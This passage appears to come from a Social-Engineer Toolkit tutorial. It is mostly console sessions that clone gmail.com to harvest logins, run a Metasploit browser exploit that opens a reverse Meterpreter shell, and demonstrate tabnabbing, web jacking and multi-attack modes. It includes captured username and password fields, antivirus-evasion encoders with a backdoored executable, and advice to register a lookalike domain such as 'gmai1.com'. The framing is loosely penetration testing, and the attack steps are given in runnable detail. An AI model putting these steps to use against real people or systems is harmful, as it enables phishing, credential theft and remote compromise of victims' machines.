1854The first method will allow SET to import a list of pre-defined
1855
1856web applications that it can utilize within the attack.
1857
1858The second method will completely clone a website of your choosing
1859
1860and allow you to utilize the attack vectors within the completely
1861
1862same web application you were attempting to clone.
1863
1864The third method allows you to import your own website, note that you
1865
1866should only have an index.html when using the import website
1867
1868functionality.
1869
1870[!] Website Attack Vectors [!]
1871
18721. Web Templates
1873
18742. Site Cloner
1875
18763. Custom Import
1877
18784. Return to main menu
1879
1880Enter number (1-4): 2
1881
1882SET supports both HTTP and HTTPS
1883
1884Example: http://www.thisisafakesite.com
1885
1886Enter the url to clone: https://gmail.com
1887
1888Enter the browser exploit you would like to use [8]:
1889
1890 1) Java AtomicReferenceArray Type Violation Vulnerability
1891
1892 2) MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption
1893
1894 3) Microsoft XML Core Services MSXML Uninitialized Memory Corruption
1895
1896 4) Adobe Flash Player Object Type Confusion
1897
1898 5) Adobe Flash Player MP4 “cprt” Overflow
1899
1900 6) MS12-004 midiOutPlayNextPolyEvent Heap Overflow
1901
1902 7) Java Applet Rhino Script Engine Remote Code Execution
1903
1904 8) MS11-050 IE mshtml!CObjectElement Use After Free
1905
1906 9) Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability
1907
1908 10) Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute
1909
1910 11) Internet Explorer CSS Import Use After Free (default)
1911
1912 12) Microsoft WMI Administration Tools ActiveX Buffer Overflow
1913
1914 13) Internet Explorer CSS Tags Memory Corruption
1915
1916 14) Sun Java Applet2ClassLoader Remote Code Execution
1917
1918 15) Sun Java Runtime New Plugin docbase Buffer Overflow
1919
1920 16) Microsoft Windows WebDAV Application DLL Hijacker
1921
1922 17) Adobe Flash Player AVM Bytecode Verification Vulnerability
1923
1924 18) Adobe Shockwave rcsL Memory Corruption Exploit
1925
1926 19) Adobe CoolType SING Table “uniqueName” Stack Buffer Overflow
1927
1928 20) Apple QuickTime 7.6.7 Marshaled_pUnk Code Execution
1929
1930 21) Microsoft Help Center XSS and Command Execution (MS10-042)
1931
1932 22) Microsoft Internet Explorer iepeers.dll Use After Free (MS10-018)
1933
1934 23) Microsoft Internet Explorer “Aurora” Memory Corruption (MS10-002)
1935
1936 24) Microsoft Internet Explorer Tabular Data Control Exploit (MS10-018)
1937
1938 25) Microsoft Internet Explorer 7 Uninitialized Memory Corruption (MS09-002)
1939
1940 26) Microsoft Internet Explorer Style getElementsbyTagName Corruption (MS09-072)
1941
1942 27) Microsoft Internet Explorer isComponentInstalled Overflow
1943
1944 28) Microsoft Internet Explorer Explorer Data Binding Corruption (MS08-078)
1945
1946 29) Microsoft Internet Explorer Unsafe Scripting Misconfiguration
1947
1948 30) FireFox 3.5 escape Return Value Memory Corruption
1949
1950 31) FireFox 3.6.16 mChannel use after free vulnerability
1951
1952 32) Metasploit Browser Autopwn (USE AT OWN RISK!)
1953
1954 set:payloads> 7
1955
1956 1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker
1957
1958 2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker
1959
1960 3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker
1961
1962 4) Windows Bind Shell Execute payload and create an accepting port on remote system.
1963
1964 5) Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline
1965
1966 6) Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
1967
1968 7) Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
1969
1970 8) Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports
1971
1972 9) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
1973
1974 10) Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and use Reverse Meterpreter
1975
1976 11) Download/Run your Own Executable Downloads an executable and runs it
1977
1978 set:payloads> 2
1979
1980set:payloads> Port to use for the reverse [443]:
1981
1982[*] Cloning the website: https://gmail.com
1983
1984[*] This could take a little bit…
1985
1986[*] Injecting iframes into cloned website for MSF Attack….
1987
1988[*] Malicious iframe injection successful…crafting payload.
1989
1990 ***************************************************
1991
1992Web Server Launched. Welcome to the SET Web Attack.
1993
1994***************************************************
1995
1996 [–] Tested on IE6, IE7, IE8, IE9, IE10, Safari, Chrome, and FireFox [–]
1997
1998[*] Launching MSF Listener…
1999
2000[*] This may take a few to load MSF…
2001
2002[-] ***
2003
2004[-] * WARNING: No database support: String User Disabled Database Support
2005
2006 =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
2007
2008+ — –=[ 891 exploits – 484 auxiliary – 149 post
2009
2010+ — –=[ 251 payloads – 28 encoders – 8 nops
2011
2012 =[ svn r15540 updated 23 days ago (2012.06.27)
2013
2014 resource (src/program_junk/meta_config)> use windows/browser/ms10_002_aurora
2015
2016resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
2017
2018PAYLOAD => windows/meterpreter/reverse_tcp
2019
2020resource (src/program_junk/meta_config)> set LHOST 172.16.32.129
2021
2022LHOST => 172.16.32.129
2023
2024resource (src/program_junk/meta_config)> set LPORT 443
2025
2026LPORT => 443
2027
2028resource (src/program_junk/meta_config)> set URIPATH /
2029
2030URIPATH => /
2031
2032resource (src/program_junk/meta_config)> set SRVPORT 8080
2033
2034SRVPORT => 8080
2035
2036resource (src/program_junk/meta_config)> set ExitOnSession false
2037
2038ExitOnSession => false
2039
2040resource (src/program_junk/meta_config)> exploit -j
2041
2042[*] Exploit running as background job.
2043
2044msf exploit(ms10_002_aurora) >
2045
2046[*] Started reverse handler on 172.16.32.129:443
2047
2048[*] Using URL: http://0.0.0.0:8080/
2049
2050[*] Local IP: http://172.16.32.129:8080/
2051
2052[*] Server started
2053
2054Once the victim browses the website, it will look exactly like the site you cloned and then compromise the system.
2055
2056[*] Sending stage (748544 bytes) to 172.16.32.131
2057
2058[*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1183) at Thu Sep 09 10:14:22 -0400 2010
2059
2060msf exploit(handler) > sessions -i 1
2061
2062[*] Starting interaction with 1…
2063
2064meterpreter > shell
2065
2066Process 2988 created.
2067
2068Channel 1 created.
2069
2070Microsoft Windows XP [Version 5.1.2600]
2071
2072(C) Copyright 1985-2001 Microsoft Corp
2073
2074C:\Documents and Settings\Administrator\Desktop>
2075Credential Harvester Attack Method
2076
2077The credential harvester attack method is used when you don’t want to specifically get a shell but perform phishing attacks in order to obtain username and passwords from the system. In this attack vector, a website will be cloned, and when the victim enters in the user credentials, the usernames and passwords will be posted back to your machine and then the victim will be redirected back to the legitimate site.
2078
20791) Java Applet Attack Method
2080
2081 2) Metasploit Browser Exploit Method
2082
2083 3) Credential Harvester Attack Method
2084
2085 4) Tabnabbing Attack Method
2086
2087 5) Man Left in the Middle Attack Method
2088
2089 6) Web Jacking Attack Method
2090
2091 7) Multi-Attack Web Method
2092
2093 8) Victim Web Profiler
2094
2095 9) Create or import a CodeSigning Certificate
2096
2097 99) Return to Main Menu
2098
2099 set:webattack>3
2100
2101 The first method will allow SET to import a list of pre-defined web
2102
2103 applications that it can utilize within the attack.
2104
2105 The second method will completely clone a website of your choosing
2106
2107 and allow you to utilize the attack vectors within the completely
2108
2109 same web application you were attempting to clone.
2110
2111 The third method allows you to import your own website, note that you
2112
2113 should only have an index.html when using the import website
2114
2115 functionality.
2116
2117 1) Web Templates
2118
2119 2) Site Cloner
2120
2121 3) Custom Import
2122
2123 99) Return to Webattack Menu
2124
2125set:webattack> 2
2126
2127Email harvester will allow you to utilize the clone capabilities within SET to harvest credentials or parameters from a website as well as place them into a report.
2128
2129SET supports both HTTP and HTTPS
2130
2131Example: http://www.thisisafakesite.com
2132
2133Enter the url to clone: https://gmail.com
2134
2135[*] Cloning the website: https://gmail.com
2136
2137[*] This could take a little bit…
2138
2139The best way to use this attack is if username and password form
2140
2141fields are available. Regardless, this captures all POSTs on a website.
2142
2143[*] I have read the above message. [*]
2144
2145Press {return} to continue.
2146
2147[*] Social-Engineer Toolkit Credential Harvester Attack
2148
2149[*] Credential Harvester is running on port 80
2150
2151[*] Information will be displayed to you as it arrives below:
2152
2153Once the victim clicks the link, they will be presented with an exact replica of gmail.com and hopefully be enticed to enter their username and password into the form fields.
2154
2155
2156
2157As soon as the victim hits sign in, we are presented with the credentials and the victim is redirected back to the legitimate site.
2158
2159[*] Social-Engineer Toolkit Credential Harvester Attack
2160
2161[*] Credential Harvester is running on port 80
2162
2163[*] Information will be displayed to you as it arrives below:
2164
2165172.16.32.131 – – [09/Sep/2010 10:12:55] “GET / HTTP/1.1” 200 –
2166
2167[*] WE GOT A HIT! Printing the output:
2168
2169PARAM: ltmpl=default
2170
2171PARAM: ltmplcache=2
2172
2173PARAM: continue=https://mail.google.com/mail/?
2174
2175PARAM: service=mail
2176
2177PARAM: rm=false
2178
2179PARAM: dsh=-7536764660264620804
2180
2181PARAM: ltmpl=default
2182
2183PARAM: ltmpl=default
2184
2185PARAM: scc=1
2186
2187PARAM: ss=1
2188
2189PARAM: timeStmp=
2190
2191PARAM: secTok=
2192
2193PARAM: GALX=nwAWNiTEqGc
2194
2195POSSIBLE USERNAME FIELD FOUND: Email=thisismyuser
2196
2197POSSIBLE PASSWORD FIELD FOUND: Passwd=thisismypassword
2198
2199PARAM: rmShown=1
2200
2201PARAM: signIn=Sign+in
2202
2203PARAM: asts=
2204
2205[*] WHEN YOUR FINISHED. HIT CONTROL-C TO GENERATE A REPORT
2206
2207Also note that when your finished to hit CONTROL-C, and a report will be generated for you in two formats. The first is an html-based report; the other is xml if you need to parse the information into another tool.
2208
2209^C[*] File exported to reports/2010-09-09 10:14:30.152435.html for your reading pleasure…
2210
2211[*] File in XML format exported to reports/2010-09-09 10:14:30.152435.xml for your reading pleasure…
2212
2213Press {return} to return to the menu.^C
2214
2215The Social-Engineer Toolkit “Web Attack” vector is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.
2216
2217Enter what type of attack you would like to utilize.
2218
2219The Java Applet attack will spoof a Java Certificate and deliver a metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.
2220
2221The Metasploit browser exploit method will utilize select
2222
2223Metasploit browser exploits through an iframe and deliver
2224
2225a Metasploit payload.
2226
2227The Credential Harvester Method will utilize web cloning
2228
2229of a website that has a username and password field and
2230
2231harvest all the information posted to the website.
2232
2233The TabNabbing Method will wait for a user to move to a
2234
2235different tab, then refresh the page to something different.
2236
2237The Man Left in the Middle Attack Method was introduced by
2238
2239Kos and utilizes HTTP REFERER’s in order to intercept fields
2240
2241and harvest data from them. You need to have an already vulnerable
2242
2243site and incorporate <script src=”http://YOURIP/”>. This could either
2244
2245be from a compromised site or through XSS.
2246
2247The web jacking attack method was introduced by white_sheep, Emgent
2248
2249and the Back|Track team. This method utilizes iframe replacements to
2250
2251make the highlighted URL link to appear legitimate however when clicked
2252
2253a window pops up then is replaced with the malicious link. You can edit
2254
2255the link replacement settings in the set_config if its to slow/fast.
2256
2257The multi-attack will add a combination of attacks through the web attack
2258
2259menu. For example you can utilize the Java Applet, Metasploit Browser,
2260
2261Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
2262
2263all at once to see which is successful.
2264
2265 1) Java Applet Attack Method
2266
2267 2) Metasploit Browser Exploit Method
2268
2269 3) Credential Harvester Attack Method
2270
2271 4) Tabnabbing Attack Method
2272
2273 5) Man Left in the Middle Attack Method
2274
2275 6) Web Jacking Attack Method
2276
2277 7) Multi-Attack Web Method
2278
2279 8) Victim Web Profiler
2280
2281 9) Create or import a CodeSigning Certificate
2282
2283 99) Return to Main Menu
2284
2285set:webattack> ^C
2286
2287Thank you for shopping at the Social-Engineer Toolkit.
2288
2289 Hack the Gibson…and remember…hugs are worth more than handshakes.
2290
2291root@bt:/pentest/exploits/set# firefox reports/2010-09-09\ 10\:14\:30.152435.
2292
22932010-09-09 10:14:30.152435.html 2010-09-09 10:14:30.152435.xml
2294
2295root@bt:/pentest/exploits/set# firefox reports/2010-09-09\ 10\:14\:30.152435.html
2296
2297
2298Tabnabbing Attack Method
2299
2300The tabnabbing attack method is used when a victim has multiple tabs open, when the user clicks the link, the victim will be presented with a “Please wait while the page loads”. When the victim switches tabs because he/she is multi-tasking, the website detects that a different tab is present and rewrites the webpage to a website you specify. The victim clicks back on the tab after a period of time and thinks they were signed out of their email program or their business application and types the credentials in. When the credentials are inserts, they are harvested and the user is redirected back to the original website.
2301
2302 1) Java Applet Attack Method
2303
2304 2) Metasploit Browser Exploit Method
2305
2306 3) Credential Harvester Attack Method
2307
2308 4) Tabnabbing Attack Method
2309
2310 5) Man Left in the Middle Attack Method
2311
2312 6) Web Jacking Attack Method
2313
2314 7) Multi-Attack Web Method
2315
2316 8) Victim Web Profiler
2317
2318 9) Create or import a CodeSigning Certificate
2319
2320 99) Return to Main Menu
2321
2322set:webattack>4
2323
2324 The first method will allow SET to import a list of pre-defined web
2325
2326 applications that it can utilize within the attack.
2327
2328 The second method will completely clone a website of your choosing
2329
2330 and allow you to utilize the attack vectors within the completely
2331
2332 same web application you were attempting to clone.
2333
2334 The third method allows you to import your own website, note that you
2335
2336 should only have an index.html when using the import website
2337
2338 functionality.
2339
2340 1) Web Templates
2341
2342 2) Site Cloner
2343
2344 3) Custom Import
2345
2346 99) Return to Webattack Menu
2347
2348set:webattack> 2
2349
2350SET supports both HTTP and HTTPS
2351
2352Example: http://www.thisisafakesite.com
2353
2354Enter the url to clone: https://gmail.com
2355
2356[*] Cloning the website: https://gmail.com
2357
2358[*] This could take a little bit…
2359
2360The best way to use this attack is if username and password form
2361
2362fields are available. Regardless, this captures all POSTs on a website.
2363
2364[*] I have read the above message. [*]
2365
2366Press {return} to continue.
2367
2368[*] Tabnabbing Attack Vector is Enabled…Victim needs to switch tabs.
2369
2370[*] Social-Engineer Toolkit Credential Harvester Attack
2371
2372[*] Credential Harvester is running on port 80
2373
2374[*] Information will be displayed to you as it arrives below:
2375
2376The victim is presented with a webpage that says please wait while the page loads.
2377
2378
2379
2380When the victim switches tabs, the website is rewritten and then enters the credentials and is harvested.
2381
2382[*] WE GOT A HIT! Printing the output:
2383
2384PARAM: ltmpl=default
2385
2386PARAM: ltmplcache=2
2387
2388PARAM: continue=https://mail.google.com/mail/?
2389
2390PARAM: service=mail
2391
2392PARAM: rm=false
2393
2394PARAM: dsh=-9060819085229816070
2395
2396PARAM: ltmpl=default
2397
2398PARAM: ltmpl=default
2399
2400PARAM: scc=1
2401
2402PARAM: ss=1
2403
2404PARAM: timeStmp=
2405
2406PARAM: secTok=
2407
2408PARAM: GALX=00-69E-Tt5g
2409
2410POSSIBLE USERNAME FIELD FOUND: Email=sfdsfsd
2411
2412POSSIBLE PASSWORD FIELD FOUND: Passwd=afds
2413
2414PARAM: rmShown=1
2415
2416PARAM: signIn=Sign+in
2417
2418PARAM: asts=
2419
2420[*] WHEN YOUR FINISHED. HIT CONTROL-C TO GENERATE A REPORT
2421Man Left in the Middle Attack Method
2422
2423The man left in the middle attack utilizes HTTP REFERERS on an already compromised site or XSS vulnerability to pass the credentials back to the HTTP server. In this instance if you find a XSS vulnerability and send the URL to the victim and they click, the website will operate 100 percent however when they go to log into the system, it will pass the credentials back to the attacker and harvest the credentials.
2424
2425 1) Java Applet Attack Method
2426
2427 2) Metasploit Browser Exploit Method
2428
2429 3) Credential Harvester Attack Method
2430
2431 4) Tabnabbing Attack Method
2432
2433 5) Man Left in the Middle Attack Method
2434
2435 6) Web Jacking Attack Method
2436
2437 7) Multi-Attack Web Method
2438
2439 8) Victim Web Profiler
2440
2441 9) Create or import a CodeSigning Certificate
2442
2443 99) Return to Main Menu
2444
2445set:webattack> 5
2446
2447***************************************************
2448
2449 Web Server Launched. Welcome to the SET MLTM.
2450
2451***************************************************
2452
2453Man Left in the Middle Attack brought to you by:
2454
2455Kyle Osborn – kyle@kyleosborn.com
2456
2457Starting server on 0.0.0.0:80…
2458
2459[*] Server has started
2460Web Jacking Attack Method
2461
2462The web jacking attack method will create a website clone and present the victim with a link stating that the website has moved. This is a new feature to version 0.7.1. When you hover over the link, the URL will be presented with the real URL, not the attackers machine. So for example if your cloning gmail.com, the url when hovered over it would be gmail.com. When the user clicks the moved link, gmail opens and then is quickly replaced with your malicious webserver. Remember you can change the timing of the webjacking attack in the config/set_config flags.
2463
2464 1) Java Applet Attack Method
2465
2466 2) Metasploit Browser Exploit Method
2467
2468 3) Credential Harvester Attack Method
2469
2470 4) Tabnabbing Attack Method
2471
2472 5) Man Left in the Middle Attack Method
2473
2474 6) Web Jacking Attack Method
2475
2476 7) Multi-Attack Web Method
2477
2478 8) Victim Web Profiler
2479
2480 9) Create or import a CodeSigning Certificate
2481
2482 99) Return to Main Menu
2483
2484set:webattack> 6
2485
2486The first method will allow SET to import a list of pre-defined web
2487
2488 applications that it can utilize within the attack.
2489
2490 The second method will completely clone a website of your choosing
2491
2492 and allow you to utilize the attack vectors within the completely
2493
2494 same web application you were attempting to clone.
2495
2496 The third method allows you to import your own website, note that you
2497
2498 should only have an index.html when using the import website
2499
2500 functionality.
2501
2502 1) Web Templates
2503
2504 2) Site Cloner
2505
2506 3) Custom Import
2507
2508 99) Return to Webattack Menu
2509
2510set:webattack> 2
2511
2512SET supports both HTTP and HTTPS
2513
2514Example: http://www.thisisafakesite.com
2515
2516Enter the url to clone: https://gmail.com
2517
2518[*] Cloning the website: https://gmail.com
2519
2520[*] This could take a little bit…
2521
2522The best way to use this attack is if username and password form
2523
2524fields are available. Regardless, this captures all POSTs on a website.
2525
2526[*] I have read the above message. [*]
2527
2528Press {return} to continue.
2529
2530[*] Web Jacking Attack Vector is Enabled…Victim needs to click the link.
2531
2532[*] Social-Engineer Toolkit Credential Harvester Attack
2533
2534[*] Credential Harvester is running on port 80
2535
2536[*] Information will be displayed to you as it arrives below:
2537
2538When the victim goes to the site he/she will notice the link below, notice the bottom left URL, its gmail.com.
2539
2540When the victim clicks the link he is presented with the following webpage:
2541
2542If you notice the URL bar we are at our malicious web server. In cases with social-engineering, you want to make it believable, using an IP address is generally a bad idea. My recommendation is if your doing a penetration test, register a name that’s similar to the victim, for gmail you could do gmai1.com (notice the 1), something similar that can mistake the user into thinking it’s the legitimate site. Most of the time they won’t even notice the IP but its just another way to ensure it goes on without a hitch. Now that the victim enters the username and password in the fields, you will notice that we can intercept the credentials now.
2543
2544[*] Web Jacking Attack Vector is Enabled…Victim needs to click the link.
2545
2546[*] Social-Engineer Toolkit Credential Harvester Attack
2547
2548[*] Credential Harvester is running on port 80
2549
2550[*] Information will be displayed to you as it arrives below:
2551
2552172.16.32.131 – – [09/Sep/2010 12:15:13] “GET / HTTP/1.1” 200 –
2553
2554172.16.32.131 – – [09/Sep/2010 12:15:56] “GET /index2.html HTTP/1.1” 200 –
2555
2556[*] WE GOT A HIT! Printing the output:
2557
2558PARAM: ltmpl=default
2559
2560PARAM: ltmplcache=2
2561
2562PARAM: continue=https://mail.google.com/mail/?
2563
2564PARAM: service=mail
2565
2566PARAM: rm=false
2567
2568PARAM: dsh=-7017428156907423605
2569
2570PARAM: ltmpl=default
2571
2572PARAM: ltmpl=default
2573
2574PARAM: scc=1
2575
2576PARAM: ss=1
2577
2578PARAM: timeStmp=
2579
2580PARAM: secTok=
2581
2582PARAM: GALX=0JsVTaj70sk
2583
2584POSSIBLE USERNAME FIELD FOUND: Email=thisismyusername
2585
2586POSSIBLE PASSWORD FIELD FOUND: Passwd=thisismypassword
2587
2588PARAM: rmShown=1
2589
2590PARAM: signIn=Sign+in
2591
2592PARAM: asts=
2593
2594[*] WHEN YOUR FINISHED. HIT CONTROL-C TO GENERATE A REPORT
2595Multi-Attack Web Vector
2596
2597The multi-attack web vector is new to 0.7.1 and will allow you to specify multiple web attack methods in order to perform a single attack. In some scenarios, the Java Applet may fail however an internet explorer exploit would be successful. Or maybe the Java Applet and the Internet Explorer exploit fail and the credential harvester is successful. The multi-attack vector allows you to turn on and off different vectors and combine the attacks all into one specific webpage. So when the user clicks the link he will be targeted by each of the attack vectors you specify. One thing to note with the attack vector is you can’t utilize Tabnabbing, Cred Harvester, or Web Jacking with the Man Left in the Middle attack. Based on the attack vectors they shouldn’t be combined anyways. Let’s take a look at the multi attack vector. In this scenario I’m going to turn on the Java Applet attack, Metasploit Client-Side exploit, and the Web Jacking attack. When the victim browses the site, he/she will need to click on the link and will be bombarded with credential harvester, Metasploit exploits, and the java applet attack. I’m going to intentionally select an Internet Explorer 7 exploit and browse utilizing IE6 just to demonstrate if one fails, we have other methods.
2598
2599 1) Java Applet Attack Method
2600
2601 2) Metasploit Browser Exploit Method
2602
2603 3) Credential Harvester Attack Method
2604
2605 4) Tabnabbing Attack Method
2606
2607 5) Man Left in the Middle Attack Method
2608
2609 6) Web Jacking Attack Method
2610
2611 7) Multi-Attack Web Method
2612
2613 8) Victim Web Profiler
2614
2615 9) Create or import a CodeSigning Certificate
2616
2617 99) Return to Main Menu
2618
2619set:webattack>7
2620
2621 The first method will allow SET to import a list of pre-defined web
2622
2623 applications that it can utilize within the attack.
2624
2625 The second method will completely clone a website of your choosing
2626
2627 and allow you to utilize the attack vectors within the completely
2628
2629 same web application you were attempting to clone.
2630
2631 The third method allows you to import your own website, note that you
2632
2633 should only have an index.html when using the import website
2634
2635 functionality.
2636
2637 1) Web Templates
2638
2639 2) Site Cloner
2640
2641 3) Custom Import
2642
2643 99) Return to Webattack Menu
2644
2645set:webattack> 2
2646
2647SET supports both HTTP and HTTPS
2648
2649Example: http://www.thisisafakesite.com
2650
2651Enter the url to clone: https://gmail.com
2652
2653[*************************************************************]
2654
2655 Multi-Attack Web Attack Vector
2656
2657[*************************************************************]
2658
2659 The multi attack vector utilizes each combination of attacks
2660
2661 and allow the user to choose the method for the attack. Once
2662
2663 you select one of the attacks, it will be added to your
2664
2665 attack profile to be used to stage the attack vector. When
2666
2667 your finished be sure to select the ‘Im finished’ option.
2668
2669Select which attacks you want to use:
2670
26711. The Java Applet Attack Method (OFF)
2672
26732. The Metasploit Browser Exploit Method (OFF)
2674
26753. Credential Harvester Attack Method (OFF)
2676
26774. Tabnabbing Attack Method (OFF)
2678
26795. Man Left in the Middle Attack Method (OFF)
2680
26816. Web Jacking Attack Method (OFF)
2682
26837. Use them all – A.K.A. ‘Tactical Nuke’
2684
26858. I’m finished and want proceed with the attack.
2686
26879. Return to main menu.
2688
2689Enter your choice one at a time (hit 8 or enter to launch): 1
2690
2691Turning the Java Applet Attack Vector to ON
2692
2693Option added. Press {return} to add or prepare your next attack.
2694
2695[*************************************************************]
2696
2697 Multi-Attack Web Attack Vector
2698
2699 [*************************************************************]
2700
2701 The multi attack vector utilizes each combination of attacks
2702
2703 and allow the user to choose the method for the attack. Once
2704
2705 you select one of the attacks, it will be added to your
2706
2707 attack profile to be used to stage the attack vector. When
2708
2709 your finished be sure to select the ‘Im finished’ option.
2710
2711Select which attacks you want to use:
2712
27131. The Java Applet Attack Method (ON)
2714
27152. The Metasploit Browser Exploit Method (OFF)
2716
27173. Credential Harvester Attack Method (OFF)
2718
27194. Tabnabbing Attack Method (OFF)
2720
27215. Man Left in the Middle Attack Method (OFF)
2722
27236. Web Jacking Attack Method (OFF)
2724
27257. Use them all – A.K.A. ‘Tactical Nuke’
2726
27278. I’m finished and want proceed with the attack.
2728
27299. Return to main menu.
2730
2731Enter your choice one at a time (hit 8 or enter to launch): 2
2732
2733Turning the Metasploit Client Side Attack Vector to ON
2734
2735Option added. Press {return} to add or prepare your next attack.
2736
2737[*************************************************************]
2738
2739 Multi-Attack Web Attack Vector
2740
2741[*************************************************************]
2742
2743 The multi attack vector utilizes each combination of attacks
2744
2745 and allow the user to choose the method for the attack. Once
2746
2747 you select one of the attacks, it will be added to your
2748
2749 attack profile to be used to stage the attack vector. When
2750
2751 your finished be sure to select the ‘Im finished’ option.
2752
2753Select which attacks you want to use:
2754
27551. The Java Applet Attack Method (ON)
2756
27572. The Metasploit Browser Exploit Method (ON)
2758
27593. Credential Harvester Attack Method (OFF)
2760
27614. Tabnabbing Attack Method (OFF)
2762
27635. Man Left in the Middle Attack Method (OFF)
2764
27656. Web Jacking Attack Method (OFF)
2766
27677. Use them all – A.K.A. ‘Tactical Nuke’
2768
27698. I’m finished and want proceed with the attack.
2770
27719. Return to main menu.
2772
2773Enter your choice one at a time (hit 8 or enter to launch): 6
2774
2775Turning the Web Jacking Attack Vector to ON
2776
2777Option added. Press {return} to add or prepare your next attack.
2778
2779[*************************************************************]
2780
2781 Multi-Attack Web Attack Vector
2782
2783[*************************************************************]
2784
2785 The multi attack vector utilizes each combination of attacks
2786
2787 and allow the user to choose the method for the attack. Once
2788
2789 you select one of the attacks, it will be added to your
2790
2791 attack profile to be used to stage the attack vector. When
2792
2793 your finished be sure to select the ‘Im finished’ option.
2794
2795Select which attacks you want to use:
2796
27971. The Java Applet Attack Method (ON)
2798
27992. The Metasploit Browser Exploit Method (ON)
2800
28013. Credential Harvester Attack Method (ON)
2802
28034. Tabnabbing Attack Method (OFF)
2804
28055. Man Left in the Middle Attack Method (OFF)
2806
28076. Web Jacking Attack Method (ON)
2808
28097. Use them all – A.K.A. ‘Tactical Nuke’
2810
28118. I’m finished and want proceed with the attack.
2812
28139. Return to main menu.
2814
2815Enter your choice one at a time (hit 8 or enter to launch):
2816
2817Conversely you can use the “Tactical Nuke” option, which is option 7 that will enable all of the attack vectors automatically for you. In this example you can see the flags change and the Java Applet, Metasploit Browser Exploit, Credential Harvester, and Web Jacking attack methods have all been enabled. In order to proceed hit enter or use option 8.
2818
2819Enter your choice one at a time (hit 8 or enter to launch):
2820
2821What payload do you want to generate:
2822
2823Name: Description:
2824
28251. Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker.
2826
28272. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker.
2828
28293. Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker.
2830
28314. Windows Bind Shell Execute payload and create an accepting port on remote system.
2832
28335. Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline
2834
28356. Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
2836
28377. Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
2838
28398. Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports
2840
28419. Import your own executable Specify a path for your own executable
2842
2843Enter choice (hit enter for default):
2844
2845Below is a list of encodings to try and bypass AV.
2846
2847Select one of the below, ‘backdoored executable’ is typically the best.
2848
28491. avoid_utf8_tolower (Normal)
2850
28512. shikata_ga_nai (Very Good)
2852
28533. alpha_mixed (Normal)
2854
28554. alpha_upper (Normal)
2856
28575. call4_dword_xor (Normal)
2858
28596. countdown (Normal)
2860
28617. fnstenv_mov (Normal)
2862
28638. jmp_call_additive (Normal)
2864
28659. nonalpha (Normal)
2866
286710. nonupper (Normal)
2868
286911. unicode_mixed (Normal)
2870
287112. unicode_upper (Normal)
2872
287313. alpha2 (Normal)
2874
287514. No Encoding (None)
2876
287715. Multi-Encoder (Excellent)
2878
287916. Backdoored Executable (BEST)
2880
2881Enter your choice (enter for default):
2882
2883[-] Enter the PORT of the listener (enter for default):
2884
2885[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds…
2886
2887[-] Backdoor completed successfully. Payload is now hidden within a legit executable.
2888
2889********************************************************
2890
2891Do you want to create a Linux/OSX reverse_tcp payload
2892
2893in the Java Applet attack as well?
2894
2895********************************************************
2896
2897Enter choice yes or no: no
2898
2899Enter the browser exploit you would like to use [8]:
2900
2901 1) Java AtomicReferenceArray Type Violation Vulnerability
2902
2903 2) MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption
2904
2905 3) Microsoft XML Core Services MSXML Uninitialized Memory Corruption
2906
2907 4) Adobe Flash Player Object Type Confusion
2908
2909 5) Adobe Flash Player MP4 “cprt” Overflow
2910
2911 6) MS12-004 midiOutPlayNextPolyEvent Heap Overflow
2912
2913 7) Java Applet Rhino Script Engine Remote Code Execution
2914
2915 8) MS11-050 IE mshtml!CObjectElement Use After Free
2916
2917 9) Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability
2918
2919 10) Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute
2920
2921 11) Internet Explorer CSS Import Use After Free (default)
2922
2923 12) Microsoft WMI Administration Tools ActiveX Buffer Overflow
2924
2925 13) Internet Explorer CSS Tags Memory Corruption
2926
2927 14) Sun Java Applet2ClassLoader Remote Code Execution
2928
2929 15) Sun Java Runtime New Plugin docbase Buffer Overflow
2930
2931 16) Microsoft Windows WebDAV Application DLL Hijacker
2932
2933 17) Adobe Flash Player AVM Bytecode Verification Vulnerability
2934
2935 18) Adobe Shockwave rcsL Memory Corruption Exploit
2936
2937 19) Adobe CoolType SING Table “uniqueName” Stack Buffer Overflow
2938
2939 20) Apple QuickTime 7.6.7 Marshaled_pUnk Code Execution
2940
2941 21) Microsoft Help Center XSS and Command Execution (MS10-042)
2942
2943 22) Microsoft Internet Explorer iepeers.dll Use After Free (MS10-018)
2944
2945 23) Microsoft Internet Explorer “Aurora” Memory Corruption (MS10-002)
2946
2947 24) Microsoft Internet Explorer Tabular Data Control Exploit (MS10-018)
2948
2949 25) Microsoft Internet Explorer 7 Uninitialized Memory Corruption (MS09-002)
2950
2951 26) Microsoft Internet Explorer Style getElementsbyTagName Corruption (MS09-072)
2952
2953 27) Microsoft Internet Explorer isComponentInstalled Overflow
2954
2955 28) Microsoft Internet Explorer Explorer Data Binding Corruption (MS08-078)
2956
2957 29) Microsoft Internet Explorer Unsafe Scripting Misconfiguration
2958
